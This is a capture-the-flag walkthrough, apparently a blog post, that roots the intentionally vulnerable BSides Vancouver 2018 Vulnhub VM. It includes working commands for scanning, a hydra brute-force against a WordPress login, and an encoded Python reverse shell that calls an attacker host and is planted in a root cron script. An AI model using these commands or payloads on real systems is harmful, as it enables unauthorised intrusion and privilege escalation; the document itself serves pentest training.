The BSides Vancouver: 2018 (Workshop) VM download from Vulnhub can be found here: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
The creator of this VM is abatchy
Here's the basic description:
Boot2root challenges aim to create a safe environment where you can perform real-world penetration testing on an (intentionally) vulnerable target.
This workshop will provide you with a custom-made VM where the goal is to obtain root level access on it.
This is a great chance for people who want to get into pentesting but don’t know where to start. *
If this sounds intimidating, don’t worry! During the workshop, we’ll be discussing various methodologies, common pitfalls and useful tools at every step of our pentest.
- Laptop capable of running two VMs and has a USB port.
- At least 20GB of free space.
- VirtualBox pre-installed.
- Kali VM
- Some familiarity with CLI.
Using the following nmap command:
nmap -O -A -sT -sV -p- -T5 192.168.1.39 -vvv
We find out there are 3 services running: FTP, SSH, and a web service:
Text output with the necessary info below with some of the SSH info stripped for layout of the site purposes:
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 17:52 public
| FTP server status:
| Connected to 192.168.1.29
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
The service is setup to allow for anonymous authentication with access to view a folder called "public". Using my web browser, I can view the public directory:
Inside the public directory we find a back up of a text file called users.txt.bk
I ran a number of different scans against the web service. Some of these tools included nikto, dirb, and dirbuster.
For this exercise, just showing the nikto output I feel is sufficient since the rest is just overkill.
So here was the Nikto command and scan results:
Nikto ended up finding a robots.txt file that had a disallow entry for /backup_wordpress
At this point we know there is a wordpress on that site. Loading up the wpscan tool with the following command:
wpscan -u http://192.168.1.39/backup_wordpress --enumerate u --enumerate p --enumerate t
We got the following interesting output:
[+] Enumerating usernames ... [+] Identified the following 2 user/s: +----+-------+------+ | Id | Login | Name | +----+-------+------+ | 1 | admin | admi | | 2 | john | joh | +----+-------+------+ [!] Default first WordPress username 'admin' is still used
So between wordpress and this users backup file we found on the FTP service, it appears we should probably look to find the user credentials for john
Using THC Hydra a password brute forcing tool, we were able to obtain john's password. The following hydra command was used to do so:
hydra -l john -P /root/Desktop/rockyou.txt 192.168.1.39 -V http-post-form '/backup_wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 25
Breaking down the above command:
-l john - specify target user is john
-P /root/Desktop/rockyou.txt - Load the rockyou password file
-V - Verbose mode
http-post-form - The supported service. HTTP POST attack
/backup_wordpress/wp-login.php: - Target URI to the login page
log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1 - The text fields for username and password. Substituing variables for hydra from above
S=Location - Success criteria. Basically grep's the page for "location" if found it was a successful login
-t 25 - Make 25 connection attempts. Anything higher on this VM and it breaks (trial and error)
So the scan took about 11 minutes to find the password of enigma which was on line #2531 of the rockyou.txt file:
Loading up the metasploit framework console, I used the following exploit:
Then set my options
After setting all the necessary options, simply type run to kick off the exploit. After entering run you should be presented with a meterpreter shell:
And now we have a shell running under the web service:
After digging around on the machine for sometime, I found the crontab owned by root was world readable.
So root has this cleanup script that runs basically every second based on numerous leading asteriks which denotes when it should run. The cleanup script has world read,write, execute permissions (777):
I proceeded to download this script from the meterpreter shell:
The contents of the script:
#!/bin/sh rm -rf /var/log/apache2/* # Clean those damn logs!!
Using msfvenom we will replace the contents of the cleanup script with a python reverse shell using the following command:
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.29 lport=8888
msfvenom will then output a chunk of code that will be our reverse python shell:
python -c "exec('aW1wb3J0IHNvY2tldCAgICAsIHN1YnByb2Nlc3MgICAgLCBvcyAgOyAgICAgICAgIGhvc3Q9IjE5Mi4xNjguMS4yOSIgIDsgICAgICAgICBwb3J0PTg4ODggIDsgICAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgLCBzb2NrZXQuU09DS19TVFJFQU0pICA7ICAgICAgICAgcy5jb25uZWN0KChob3N0ICAgICwgcG9ydCkpICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgMCkgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAxKSAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsIDIpICA7ICAgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"
I replaced the command previously in the cleanup script with the above python code.
After editing in my payload, I upload the script back to the server in my meterpreter shell:
Then on my Kali system I create a netcat listener on port 8888 using
nc -lvp 8888
After a brief moment, I receive the reverse root shell as expected:
In the /root directory there is a flag.txt file which basically says congrats you obtained root. It also says there were numerous other ways to obtain root, did you find them?
There you have it!